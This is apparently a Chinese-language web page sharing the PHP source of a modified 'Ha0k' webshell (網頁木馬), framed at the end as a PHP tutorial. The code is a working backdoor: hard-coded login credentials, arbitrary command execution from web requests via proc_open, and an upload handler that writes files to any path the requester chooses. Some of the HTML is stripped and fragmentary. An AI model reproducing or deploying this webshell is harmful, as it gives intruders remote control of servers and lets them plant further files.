Ha0k 03 PHP 網頁木馬修改版

複製代碼 代碼如下:

//此處可設定多個使用者
$passwd = array('ha0k' => 'ha0k',
'hackerdsb'=>'hackerdsb');
/* 此處設定命令的別名 */
$aliases = array('ls' => 'ipconfig',
'll' => 'ls -lvhF');
if (!isset($_SERVER['PHP_AUTH_USER'])||!isset($_SERVER['PHP_AUTH_PW'])||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
header('WWW-Authenticate: Basic realm="by Ha0k"');
header('HTTP/1.0 401 Unauthorized');
$authenticated = false;
}
else {
$authenticated = true;
/* 開始session */
session_start();
/* 初始化session. */
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd(); //取目前的目錄
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) { //0表關閉，1表開啟，開啟時過濾
/* We don't want to add the commands to the history in the
* escaped form, so we remove the backslashes now. */
$_REQUEST['command'] = stripslashes($_REQUEST['command']); //將用addslashes()函數處理後的字串返回原樣
}
/* history */
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) //尋找儲存數組中的值
unset($_SESSION['history'][$i]); //銷毀
array_unshift($_SESSION['history'], $_REQUEST['command']);//array_unshift()函數的作用是在一個數組中插入新的元素。而這個新的數組將被添加到原數組的開頭部分。函數最終返回的是插入新元素後的數組。
/* 輸出Ha0k# command */
$_SESSION['output'] .= 'Ha0k# ' . $_REQUEST['command'] . "\n";
/* Initialize the current working directory. */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname(__FILE__); //擷取當前所在目錄
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
if ($regs[1][0] == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) { //改變目前的目錄
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} else {
/* The command is not a 'cd' command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']); //改變目錄
/* 別名擴充 */
$length = strcspn($_REQUEST['command'], " \t"); //尋找\t字串，返回位置
$token = substr($_REQUEST['command'], 0, $length); //取字串0-\t
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
$p = proc_open($_REQUEST['command'], //執行指令碼
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
/* 讀出發送 */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]), //轉換特殊字元為HTML字元編碼
ENT_COMPAT, 'GB2312');
}
/* 讀出 */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'GB2312');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);//關閉管道
}
}
/* 構建在JavaScript使用命令記錄 */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';//將數組搞成字串
}
}
header('Content-Type: text/html; charset=GB2312');
echo '' . "\n";
?>
if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
//echo "上傳檔案成功: " . $HTTP_POST_FILES['userfile']['name'];
}
?>
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


Ha0k webshell



HA0K

WE JUST FOR JUSTICE，FIGHT FOR EVIAL

You failed to authenticate yourself to PhpShell. You can href="">reload to try again.

Try reading the INSTALL file if you're having
problems with installing PhpShell.

exit;
}
error_reporting (E_ALL);
if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 10;
?>

目前的目錄為:

Mcafee(麥咖啡殺毒軟體) 防止網頁被掛馬的設定教程(最後不要在伺服器端開啟) 我們強烈建議服務器安裝mcafee 8.5i的版本
全世界最小的php網頁木馬一枚 附PHP木馬的防範方法

以上就介紹了 Ha0k 03 PHP 網頁木馬修改版，包括了方面的內容，希望對PHP教程有興趣的朋友有所協助。

